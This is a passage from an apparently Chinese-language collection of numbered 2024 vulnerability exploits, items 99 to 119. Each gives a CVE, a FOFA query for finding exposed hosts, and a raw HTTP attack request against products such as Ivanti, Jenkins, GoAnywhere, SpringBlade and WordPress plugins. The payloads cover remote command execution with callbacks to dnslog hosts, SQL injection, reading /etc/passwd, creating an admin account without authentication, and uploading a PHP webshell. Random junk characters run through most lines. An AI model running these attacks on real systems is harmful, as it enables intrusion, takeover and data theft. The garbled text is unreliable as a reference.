- r7 ^. J! U& sAccept: */*4 x; A; o4 s" |/ W% U" v
Accept-Encoding: gzip, deflate7 i; N7 @: H# }0 }( l5 J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 f/ u7 j! J. O) Z, Y# N5 i8 b
Content-Type: application/x-www-form-urlencoded; charset=UTF-87 f3 H9 S& R* Z9 M& m
X-Requested-With: XMLHttpRequest
& k7 h+ I( r( h6 p, g! v( m" n6 H
& z6 Z# G; w0 I+ t( [( G2 ?! hid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B, s" }& ^6 U, M3 A+ V/ B0 F
- R* e! u: ?$ W% x/ c
& j" i2 |- b1 ?
99. Ncast盈可视高清智能录播系统busiFacade RCE
5 M$ m" Z+ e% J& P; l9 nCVE-2024-03055 {# j" V2 `( f% j% L- O- ~7 {. k
FOFA:app="Ncast-产品" && title=="高清智能录播系统"2 c4 ?' \% g& E' ?/ _- r ~% Q5 ?
POST /classes/common/busiFacade.php HTTP/1.1
$ z& K1 U! \8 t: d0 U2 ^, mHost: 192.168.40.130:8080
1 b% l, x. A+ g: ]4 @! aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0- p( k8 W% l7 Y/ K' j* r1 g3 Z! f2 S
Connection: close
" d/ j' O3 F% D+ y9 @2 u; NContent-Length: 154
% i( }0 C9 ~5 _; GAccept: */*
- a- Q& N, I X) xAccept-Encoding: gzip, deflate
1 c/ n- e) I" t2 vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) Q! }5 o8 A( W* H/ f6 _1 `
Content-Type: application/x-www-form-urlencoded; charset=UTF-8. M1 q# Q* o8 v. g
X-Requested-With: XMLHttpRequest
7 w0 W; z+ Y3 q9 {
' z( N5 R9 j# \6 P8 D4 _3 r& N* O* Q%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D( }9 j' _ Z3 p) I9 g8 j
( ^; _5 G: f- v7 z; u" h
* C/ P7 a- _' s( z
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传! ?9 f+ J/ @! }; s; G
CVE-2024-0352
E5 _% O3 O: H% l% W: v( ZFOFA:icon_hash="874152924"
5 C) w6 v ~( x9 f/ ZPOST /api/file/formimage HTTP/1.1; l, N1 Q9 E) ^6 o
Host: 192.168.40.1308 x5 u i! f" j V- U
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36" c4 s5 l1 X4 t5 f. Q1 Q9 p
Connection: close
& d7 s) s7 A0 |8 z J& {. g! K* i( s2 \Content-Length: 201- a" u( ]! `5 @! G; I/ m# j( H
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei2 {" ?* F7 _5 X& I+ q; x5 @
Accept-Encoding: gzip9 H6 E" s: L. ~3 J( v$ x
2 T6 V, h7 Q8 m! ~$ F% [------WebKitFormBoundarygcflwtei
: N8 v: e) z8 D2 r. y0 n1 BContent-Disposition: form-data; name="file";filename="IE4MGP.php"
: m" h, K2 K# s3 |' _* m! EContent-Type: application/x-php
( S# ?+ e$ Y! f; C8 T
" s) l3 T3 u- x( q# L- @2ayyhRXiAsKXL8olvF5s4qqyI2O
4 h/ {3 R/ D0 @7 M7 L0 e: ~------WebKitFormBoundarygcflwtei--
! }' B4 H; E& A" V' Y. E) K% c# [6 y! q
- b: ^1 s$ U' Q! S+ e
101. ivanti policy secure-22.6命令注入
+ Q" z# u, [7 Z6 w6 CCVE-2024-21887
% s% J& L8 ]* v E" z. H+ d% D( A( [FOFA:body="welcome.cgi?p=logo"
1 }5 c f/ Z; S+ @GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.10 q# o8 ]9 {8 F- F( w* ]7 G! G9 j. f
Host: x.x.x.xx.x.x.x! l2 q3 x ^$ K1 @% k8 F4 e9 j
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36% u+ Z1 K. G: {# R6 J y( P
Connection: close; i3 R9 g+ Q9 h
Accept-Encoding: gzip/ E: `! U+ J! o7 E8 I5 v k
% G' u1 S0 l0 \2 ~) o; \# _3 u3 C3 d. y' I% x$ R
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
' @: @& _( }; p7 KCVE-2024-21893; ?+ p, @' P6 h1 H" R: }
FOFA:body="welcome.cgi?p=logo"
6 S* M1 x3 t; }' UPOST /dana-ws/saml20.ws HTTP/1.1
6 L# s0 ~/ G3 E& L4 _Host: x.x.x.x
; y. C: L) o# A& _ _+ a! oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.360 N* f8 E. a4 U* I/ y3 K; l
Connection: close+ h. Q* [( u2 ~* [5 E/ B( K F' D
Content-Length: 792
3 C8 S" t2 R o7 V: d3 p6 h! JAccept-Encoding: gzip
+ O0 d+ [ X+ H1 V5 D; K
: o5 \- {: u/ y+ U' ?+ @8 P7 T<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>6 F; H% D. O9 y7 T% g( @& a# X
! B# v# U+ l5 J5 z! x% c
103. Ivanti Pulse Connect Secure VPN XXE- d/ G7 T& h( N! V( y5 X: e
CVE-2024-220241 |8 d9 O2 [1 w
FOFA:body="welcome.cgi?p=logo"
( g2 D0 ?: Z; s" ^8 E: EPOST /dana-na/auth/saml-sso.cgi HTTP/1.1
! k1 T. ^9 k) L$ A* SHost: 192.168.40.130:111
) [+ s: S' [$ U2 C5 FUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
`8 n0 }( y/ C4 s7 H! |Connection: close
+ a# h7 J; S6 K6 @! zContent-Length: 204+ t- N' d- j) [, ]7 W$ d6 T4 l
Content-Type: application/x-www-form-urlencoded
5 b5 p+ }% F2 EAccept-Encoding: gzip' R/ F ^ b/ s" f$ p" z
+ U8 Q, p5 [, L( z
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==0 B4 a8 j* ]# f6 i
$ v! `) D, x1 n- P: W6 b7 n+ T( @1 k) d6 {* B
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下+ e& V8 B- {8 ~& y
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
5 E+ f' b1 {/ h' U/ @% C5 ^# V6 Y
& a3 N4 Y7 M [2 \7 a
, n4 v ]7 i+ P2 N- ^9 ~( v104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露9 W. J9 f; U" N+ n1 y
CVE-2024-05698 q& p, S& n$ \, w' k
FOFA:title="TOTOLINK"
! C l* M& [; |% Z. BPOST /cgi-bin/cstecgi.cgi HTTP/1.1 h& H# `8 s& R- h) z, j
Host:192.168.0.18 q* A0 g. C* V" ]
Content-Length:413 @( O D, c3 B( }- k2 z- A: i
Accept:application/json,text/javascript,*/*;q=0.01
" c5 R8 x2 v+ H ]! O0 f1 i& s/ NX-Requested-with: XMLHttpRequest
; y0 E' T4 M6 ~User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36* [6 R; t+ f& \5 Q4 [7 y8 ^
Content-Type: application/x-www-form-urlencoded:charset=UTF-8% _. o) Y- Q. W! o
Origin: http://192.168.0.1
5 J2 M# J4 ~* gReferer: http://192.168.0.1/advance/index.html?time=16711523805641 Y% C W* K' j0 b2 Z9 W
Accept-Encoding:gzip,deflate8 }1 Y) b' J: v$ Q, Y" H; O; x
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7$ ~) Q- }1 w& w V0 m) Q
Connection:close
/ I8 ^0 O! y! G7 ]: c# u! u8 T2 w/ G) F8 u% V' q* D
{
/ h/ |& d. f3 m6 e"topicurl":"getSysStatusCfg",' e" x' u" [6 F4 A3 C% J
"token":""% c* ]5 w' d( R3 P; @( f0 U" V
} ]' f! j9 N- N6 ?6 d/ A
7 S/ e; ]* g/ f. l# X105. SpringBlade v3.2.0 export-user SQL 注入
& ?$ [* {% {5 ?! ~0 T# N/ yFOFA:body="https://bladex.vip"/ @% H! F- V& c4 h& _, k
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1. g- s8 p. l) v6 G
4 F6 r$ P0 h6 J- S! k
106. SpringBlade dict-biz/list SQL 注入
4 E- f* `4 F* ^; WFOFA:body="Saber 将不能正常工作"* ^' Y4 i& b+ W8 f5 c1 |0 t
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
# f# q: o; r8 d+ c; NHost: your-ip
! n% m/ {$ @, ]5 k+ v, ^: z) qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ e; k' h* g F5 A/ K9 }
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A3 y% Z) O4 ^0 e8 n6 a. {7 T* A6 _
Accept-Encoding: gzip, deflate
* ?. J! a P5 ?% B- ~' FAccept-Language: zh-CN,zh;q=0.9
* J0 q" L F7 x BConnection: close+ ]1 U8 y" o, }* W/ {6 g6 j ]7 N
% _( j' N4 e7 t$ o( d
7 o! [+ M! H4 S) C107. SpringBlade tenant/list SQL 注入
& ?& z( e! z9 x8 R& H/ Q1 ]FOFA:body="https://bladex.vip"+ G" F5 s X1 ^, u6 K
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1/ Z& R1 J5 ?) c1 p
Host: your-ip5 y$ D$ X- J7 r1 S: Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! E; E5 r) c% w
Blade-Auth:替换为自己的
# P6 k4 {- I' Z0 w ~- |8 g6 q: iConnection: close
. o- [- R( D; j4 I2 Z, \4 U" i% [# ^9 D
1 T3 ?1 l/ X! _! @% W) |. I3 |7 c108. D-Tale 3.9.0 SSRF7 W' K4 J0 r# M- }+ Q) B% }$ E6 B
CVE-2024-21642" o1 J& X. L$ o: [
FOFA:"dtale/static/images/favicon.png", O# R+ p! n8 e+ x. _2 i( O
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.12 g+ j( T- U1 O: i
Host: your-ip/ b. {+ v1 P H6 G; k" Q! p
Accept: application/json, text/plain, */*
' i* K! g+ |6 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.367 C5 [6 K3 x! _3 c7 a$ t& b
Accept-Encoding: gzip, deflate Q; r& ^8 Z7 L% o
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
7 m- f# d. |3 A" P- dConnection: close
5 k* o2 K$ ]/ u! d6 q! n3 O H6 Q( C2 v0 B! G5 b
$ ^! W3 ^: ]4 R; I
109. Jenkins CLI 任意文件读取
, C C" L% y( F2 bCVE-2024-23897
9 \/ h4 t, v+ q6 y9 W# }/ qFOFA:header="X-Jenkins"
1 `" k; J& s' I8 JPOST /cli?remoting=false HTTP/1.1
# a7 X/ I- q" d& V5 {& {Host:6 Z# H$ g0 `, u) K+ ]9 h$ `
Content-type: application/octet-stream
) D H# _' }; H2 R/ E* F& \/ E4 gSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
; A, x8 Q) X9 X' i( @Side: upload
- J6 K4 a* u s: @( c, e4 l. n, iConnection: keep-alive
4 F" t: A* y3 ?! Q0 xContent-Length: 163
' J4 C3 {( n& q, m- M/ U' W/ t* {& @; U( ] a
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'. ]7 d4 t' \9 v. p, O- E& {0 \5 L
9 ?% h. h. F0 D
. _/ O8 a2 X# E2 m6 s4 ePOST /cli?remoting=false HTTP/1.14 W& N2 A3 g) W+ w
Host:7 l7 \4 @& b3 r. R# D8 p$ d
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
7 y' V) @6 m. X' K, V6 @) ndownload
/ Q, g- V, r) b9 m q+ t2 bContent-Type: application/x-www-form-urlencoded# J0 j; n# i5 e+ Z
Content-Length: 0, l6 P) d5 j% k& ~+ _
$ y: F4 X2 L) [! j& _0 y' U
& S' f5 y( B$ S; J7 ^( |ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
$ Q& y# M8 q3 o) t% \java -jar jenkins-cli.jar help
: {) y) f5 [" f3 g6 i' I4 `, d/ R& P% P[COMMAND]2 B- A6 L" w+ y: F0 k6 Y) Y8 L, o
Lists all the available commands or a detailed description of single command.$ w3 C# U0 `, s3 w
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
@* b9 P4 ?, O5 r9 F) C: Z5 z+ }( s3 Y$ U( A$ b: L. Q
4 Z2 t8 N: D9 e. P110. Goanywhere MFT 未授权创建管理员
- U0 x4 e3 H$ |) Q V0 _! q& ECVE-2024-0204
: E2 K. ^0 {. c7 s4 `1 @FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"0 B O5 \7 x0 w W' M, _
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
7 t- z, h" h+ G A7 OHost: 192.168.40.130:8000
8 S& ~# t$ _* G4 qUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
% Q3 W. u1 J2 }Connection: close% {, P, j* F/ {+ _, ]5 U
Accept: */*
2 {3 u4 U3 r1 L5 r7 HAccept-Language: en
5 b, I% g" c" u: k* vAccept-Encoding: gzip
2 v- |8 t" e' Z+ ^3 Y) Z8 `: E; J @7 W+ L; r2 m, A' z
! O& q- V$ s! `) G2 B111. WordPress Plugin HTML5 Video Player SQL注入
+ I( i( Z) C) r5 ? oCVE-2024-1061
b( a) O- i* O0 V2 z- T( |/ eFOFA:"wordpress" && body="html5-video-player"2 Z8 e0 s% y! O! r" \' o
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.13 p" {6 k* v/ L" Q. |
Host: 192.168.40.130:112
1 g, [) ~1 S6 |1 `User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
2 i; O6 e, B" ?: `- T3 Z p8 iConnection: close
1 h! K4 p% f- @8 o- O6 s" [Accept: */*7 _0 Y6 Q" q+ _' M7 [! T. k
Accept-Language: en
3 h0 X4 `* ?7 T* w9 wAccept-Encoding: gzip
+ j" q5 q# U* |* c; L. W5 H) y" D( D U
6 d/ u1 C& {" k l7 i: T112. WordPress Plugin NotificationX SQL 注入" d) B1 R+ l, k$ y% Z9 K
CVE-2024-16988 M+ F* T* V3 Z7 H4 \
FOFA:body="/wp-content/plugins/notificationx"" y$ I3 L( G1 x% K+ W' C1 U
POST /wp-json/notificationx/v1/analytics HTTP/1.1
8 j' N' n8 L5 b, U4 w- K# ~3 GHost: {{Hostname}}, C& T2 U- r% _- y0 Z9 h4 m) g
Content-Type: application/json- b$ {; p9 I# ] z
/ F* r2 p& I4 K+ A: E" L t{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}% O! c) [+ W+ U! r: m% y$ \
q- f! B6 d& t8 Q
9 H4 ]8 H" G u" g
113. WordPress Automatic 插件任意文件下载和SSRF4 Z/ G* @9 d! g: X( J, L* D; ?. T
CVE-2024-27954
m" ^* }2 |6 h, z: B$ C; GFOFA:"/wp-content/plugins/wp-automatic"0 I/ O( p" ]3 [, ]
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1! J2 a) v! R1 J& N- D% d0 l
Host: x.x.x.x
/ u) `# W% h6 F ]2 ^3 H. t6 p) E! `User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.362 R2 A, c/ w& W2 w
Connection: close
; s4 X2 ]8 u9 g- `7 |9 z3 Q7 S3 P6 yAccept: */*
" x$ T7 d1 t9 `! i3 o' V9 b4 vAccept-Language: en
/ O$ }# f! J6 A& h; ZAccept-Encoding: gzip
+ n0 n( {3 l4 x9 x$ M' Y! \
/ S, E4 h$ V9 \+ E
% V1 N% q3 C* Y( b) Y9 y114. WordPress MasterStudy LMS插件 SQL注入4 L3 v1 V) p% S9 ~. V( W5 {
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"2 v0 R" [% n! @ u0 t' o2 {2 J7 O* ?
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1( D" I, b: z* t$ r+ X( Z
Host: your-ip! n5 D: f: x9 `
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
- }8 e6 s/ W: l+ b0 O$ L" j QAccept-Charset: utf-8- j% M' ]: z; L& [% G5 B
Accept-Encoding: gzip, deflate+ l$ b; S4 Q7 F1 M9 e
Connection: close7 g% @" H7 @# F
& K& K( Z) g/ r. T' B4 ^2 b
9 N4 T' D2 l! Z4 F+ W6 _
115. WordPress Bricks Builder <= 1.9.6 RCE5 i2 ~1 }5 Y6 c C* V! m
CVE-2024-25600& R% q! E2 W( A Y, W+ L
FOFA: body="/wp-content/themes/bricks/"' h, }/ Z; N- x R8 T
第一步,获取网站的nonce值
# [5 Z, y; S% V3 m( y! zGET / HTTP/1.1
+ u0 L' Q$ G! Q: SHost: x.x.x.x" N6 r4 k2 o' y
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36, B* A/ p: {& x, Y! ?2 [1 K
Connection: close) x9 `( b3 R) | w: C
Accept-Encoding: gzip
' S1 L6 ]3 |6 }$ `, b6 ]. X+ l7 ~1 ]/ d: }) t6 z
' U; \- Q( C7 b
第二步替换nonce值,执行命令
+ l! [3 z N; @/ TPOST /wp-json/bricks/v1/render_element HTTP/1.1
0 A0 v9 u. M+ Z& s u. R! x; ^7 XHost: x.x.x.x
/ s0 V* J6 e2 GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36" `0 s0 s8 H* f/ d5 L3 `' Z
Connection: close
# e; T: ], P+ l; ]9 VContent-Length: 356+ b7 H4 t' m" w" A% Y; |& O9 W
Content-Type: application/json3 u. E; H2 ?& b; ~1 D% k
Accept-Encoding: gzip
( } W/ J' P& o7 { h. o
& r* n9 ^* G) E0 n% C{; S2 H( _6 t# t1 l3 w" n, p
"postId": "1",6 G8 L6 t. }6 l& W, O* k
"nonce": "第一步获得的值",
% N9 J; E' @- N4 ^& Q4 t "element": {
; d: L/ [8 f4 E& p( m/ g "name": "container",
: O0 Y2 i2 i5 m: W8 u "settings": {
) ?1 G9 C: s+ m0 n$ r+ i "hasLoop": "true",( b- O. f* N( l3 B( I* t; }4 m
"query": {1 C6 Z& Q- M8 g2 j8 F+ R0 R
"useQueryEditor": true,
S" M* P. ~5 A8 Y0 t5 Z8 d "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
4 Q, Y# Q6 e; a# ^4 w' \% k, c "objectType": "post"; M5 _; h: t0 ]) |" f. }
}
2 @3 K; x; n+ C8 i# U4 i0 O. m. Z }7 _0 f% t+ g: ^* Z. H) E
}) @, y& [+ o' W/ h+ o9 t
}
% @; d* g! {% D7 O) P* V! G3 @, `- G( N6 M1 k0 M6 n4 Y9 M
/ R, V# m4 {* z% ?( h) I9 v1 B
116. wordpress js-support-ticket文件上传
9 h9 X2 q- |5 p. R. ^: R l1 GFOFA:body="wp-content/plugins/js-support-ticket"% A ?6 e1 N6 z8 Y8 W
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
* p% b0 s% D# M' x" {5 h3 h U5 qHost:/ j2 P4 d# @. o" ~
Content-Type: multipart/form-data; boundary=--------767099171
6 R7 z0 e& I9 A* Q$ P3 }) gUser-Agent: Mozilla/5.0- J7 y6 k. j% e
4 l# M/ S, Q @6 A. R! \+ @$ i9 \----------767099171
: {) q! C5 I1 D9 I$ NContent-Disposition: form-data; name="action"
( T4 b0 X/ C7 S) p) D0 A% t6 dconfiguration_saveconfiguration4 O5 }! C# I0 ?
----------767099171; p q5 G+ s" N$ l# n
Content-Disposition: form-data; name="form_request"% Y2 O- F0 D" E7 H' R' s
jssupportticket4 c/ ^4 {! z( } o
----------767099171
3 `5 C4 e0 R b: k, d; SContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
6 Z- C$ ?2 b) H7 c& ~) cContent-Type: image/png! G6 z- P9 Y3 c* }. q
----------767099171--
' ?2 @' [: x7 r, |. u2 ?# j
& N7 ~ n* ]3 t# x# J ?2 B4 b. ^8 H- Y' q5 u
117. WordPress LayerSlider插件SQL注入
$ U. O1 m/ b0 [; _& j$ o4 Bversion:7.9.11 – 7.10.09 j+ q; }: u A# w" M
FOFA:body="/wp-content/plugins/LayerSlider/"
5 { m6 r$ B0 v, jGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
3 F1 D1 C( V7 o* T _! [9 T0 G+ t8 Y, yHost: your-ip( y+ U% D, M. j R R; L2 w; r4 C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0! X+ i2 Z5 |- D' F& c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: F& s7 S7 N9 w8 z' `2 z1 R4 e
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! V5 ~4 d& F3 h- ^& @+ eAccept-Encoding: gzip, deflate, br# @2 w; m$ Z" ?! I# j! }
Connection: close x& K4 w/ h: L5 C7 G2 R* P- O3 E; n
Upgrade-Insecure-Requests: 13 h6 P9 E1 q w- N+ R. v
8 T+ d) N9 R, c8 B- K( h9 e( S* i
1 `8 S" S& d `: m/ m: E118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
# t% ?' Y2 H1 l7 f" sCVE-2024-0939
6 P2 p# x V# s& ~6 u2 Z- E$ AFOFA:title="Smart管理平台"& `6 z& Q7 B* h8 J/ t* X: l$ e5 N
POST /Tool/uploadfile.php? HTTP/1.1% G/ D# h' B! U
Host: 192.168.40.130:8443! x' H5 @1 z: G% M$ P
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
) E8 _; u6 c) U. W9 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
/ T, [9 w: E2 J! jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 ^: o# f- T7 N
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 p9 ?7 N2 F7 O, T5 NAccept-Encoding: gzip, deflate1 W7 K" Z) }4 u0 q
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887. @- `5 _# J% `, N9 O
Content-Length: 405
6 e( P# ~' { f9 T, dOrigin: https://192.168.40.130:8443
e# T1 D3 M, X1 u; KReferer: https://192.168.40.130:8443/Tool/uploadfile.php
- o" J; ^( _( s8 D% CUpgrade-Insecure-Requests: 1
9 k! c/ \# Y* p! ^. }/ T* NSec-Fetch-Dest: document
7 P5 `' A. C% R1 j! v( NSec-Fetch-Mode: navigate7 f* r. n& Q% G2 P3 D' m
Sec-Fetch-Site: same-origin: t: p1 p$ ^ J) ]3 X! X# m, U
Sec-Fetch-User: ?1
1 p: T' Q! l- `5 X+ S: W" q1 ITe: trailers
+ N- n! J1 t, C4 {( ?; G& xConnection: close
# z( e- y' v. z! A) ?- q& ^( ]( k" N
-----------------------------13979701222747646634037182887
K7 t* A8 n! s; K; F8 J X& Z7 uContent-Disposition: form-data; name="file_upload"; filename="contents.php"5 l4 |7 z! U5 c, v
Content-Type: application/octet-stream
; u. ^9 f$ V0 d. J) {/ \
/ N( e6 @, g! \$ D* J5 ?7 @<?php: F8 J% A: N- U: y: W8 g" I6 K* l
system($_POST["passwd"]);: E4 v5 y3 b9 [, n" J% Y0 @- @
?>
& q! X* n2 E+ V& z) `- p" i( Q0 H! `-----------------------------139797012227476466340371828877 D/ ~' m7 o& O
Content-Disposition: form-data; name="txt_path"
; _+ n) [* A" t5 o
" R0 P- w- ?' f4 }& O/home/src.php
4 H# O1 c, q) k-----------------------------13979701222747646634037182887--; w* T) x0 q) O0 b3 }
4 a8 m* Q* K5 d, h
: p$ g& A- o+ w3 K# K9 `% f! S- h, c访问/home/src.php
?+ n& `- G* _- M3 P( Z: A, e- N) A0 `0 u
119. 北京百绰智能S20后台sysmanageajax.php sql注入. ^- z- z! D* X% B/ {
CVE-2024-1254
* D9 c! n5 ^+ p% L4 I. ?FOFA:title="Smart管理平台"! }# }. A3 R( b( a) q4 f( A
先登录进入系统,默认账号密码为admin/admin
, N w( G0 z1 n2 U1 zPOST /sysmanage/sysmanageajax.php HTTP/1.11
- T9 W( _5 v( \5 QHost: x.x.x.x
+ }3 p' K; Y f+ U( ^Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee2 z2 W9 l. g5 p1 _/ B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
1 Z+ n) ?, x6 BAccept: */*4 j) G- h0 e5 k# G% W* e1 {
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 W# P1 `3 }+ K8 `' E& \" N
Accept-Encoding: gzip, deflate( L6 t8 g9 I* w2 z# M' H' z6 M4 [
Content-Type: application/x-www-form-urlencoded;9 p& e2 e. b9 V
Content-Length: 1093 j' W4 C0 C3 x+ W9 ~
Origin: https://58.18.133.60:84437 q) @6 {9 X" s, P3 D6 m6 O$ a0 R6 C
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php' `4 P1 z1 c, r
Sec-Fetch-Dest: empty
